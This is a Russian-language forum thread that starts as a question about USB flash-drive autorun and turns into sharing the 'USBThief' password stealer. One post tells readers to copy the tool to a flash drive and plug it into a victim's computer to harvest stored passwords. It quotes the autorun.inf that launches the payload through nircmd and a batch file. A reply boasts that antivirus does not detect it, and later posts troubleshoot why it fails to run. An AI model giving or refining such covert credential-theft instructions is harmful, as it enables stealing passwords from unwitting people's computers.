![]() |
Как можно сделать автозапуск с флеш-карты?
Как можно сделать автозапуск с флешки, чтобы когда я её воткну программа на флешке автоматически запускалась
Пробовал inf файл создавать [autorun] open=opera.exe icon=icon.ico Но так не работает. Как это можно сделать? |
Либо у тебя авторан выключен, либо файла opera.exe в корне флешки нет, либо ты inf файл криво обозвал
|
Цитата:
|
Я пробовал файл autorun.inf создавать и в нём написал [autorun]
open=opera.exe icon=icon.ico Kaimi если он выключен какой ключ реестра его включает? |
Источник :D
http://forum.antichat.ru/thread63601-usbthief.html Итак, для установки нам потребуется USB наситель и данная програмка. Распакуйте архив, и из папки USBThief скопируете всё на флэшку. (Важно!!! Вы ДОЛЖНЫ скопировать все файлы в главную дирикторию USB насителя! Никаких папок создавать не надо!) Как работает: Вставьте USB в компьютер Вашей жертвы В папке "dump" на USB вы увидите все пароли Ссыли: 1--- 2--- А вот содержимое авторана [autorun] action=Open Files On Folder icon=icons\drive.ico shellexecute=nircmd.exe execmd CALL batexe\progstart.bat |
У меня USB Thief не работает почему то. А для чего nircmd нужен?
|
Цитата:
Отличается от пинча тем что не палится! |
У меня тоже не работает. Я все сделал как ты написал. но голяк. Может там еще чтото нужно добавить или изменить?
|
у меня тоже не катить автоматический запуск, после двойного клика начинает запускатся. А что если человек решил открыть правой кнопкой мыши?
|
Цитата:
- если не запускается автозапуском, значит он (автозапуск) отключен для сменных устройств (имхо) |
| Время: 22:06 |